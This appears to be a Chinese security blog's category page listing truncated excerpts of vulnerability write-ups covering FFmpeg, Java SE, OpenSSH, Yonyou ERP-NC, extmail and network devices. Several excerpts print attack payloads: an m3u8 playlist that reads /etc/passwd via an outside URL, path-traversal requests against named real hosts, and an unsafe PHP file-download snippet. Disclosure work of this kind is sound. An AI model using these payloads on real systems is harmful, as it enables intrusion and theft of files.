分类 Others 下的文章
FFmpeg文件读取漏洞测试及利用
from:安全脉搏经历过ImageMagick命令执行漏洞的洗礼之后,又有FFmpeg文件读取漏洞,真是很激情。看了老外写的文章,大概理解的利用方式如下:#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://www.secpulse.com/header.m3u8|file:///etc/passwd #EXT-X-E...
Oracle out-of-band release for Java SE Vulnerability
0)漏洞简介漏洞编号:CVE-2016-0636,此漏洞是安全研究员(Adam Gowdiak)于2013年报告给Oracle的漏洞(CVE-2013-5838)的变体。由于Oracle在部分代码分支中未对该漏洞进行修补,导致了此漏洞再现江湖,影响版本:java SE 7u97, 8u73, 8u74。1)测试环境Windows 7 x86 + jdk_1.8.0_742)漏洞分析由于反射A...
华夏创新四种设备存在命令执行以及文件遍历
1.任意文件读取/tmp/appexcfg/www/acc/vpn/download.php<?php $file = $_REQUEST['f']; if(!file_exists('/www/cert/'))//判断目录是否存在 mkdir('/www/cert/');//不存在就创建 if(!file_exists("/www/ce...
Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778
Qualys Security AdvisoryRoaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778======================================================================== Contents ========================...
用友ERP-NC某处通用文件包含漏洞
漏洞作者: 管管侠详细说明:可以遍历各种系统文件,影响大量知名政校企漏洞证明:中粮集团 http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd还可以读取默认配置文件 http://nc.cofco.com/NCFindWeb?servic...
extmail邮件服务存在漏洞读取任意用户邮件内容
漏洞作者: 路人甲简要描述:1.网络磁盘 越权访问上层目录泄露文件名 2.通过添加附件将敏感文件发送到指定邮箱 3.获取邮件ID后读取任意邮件内容详细说明:漏洞1.code 区域 GET http://**.**.**.**/extmail/cgi/netdisk.cgi?__mode=list_dir&sid=xxxxf&base=../.. HTTP/1.1 漏洞...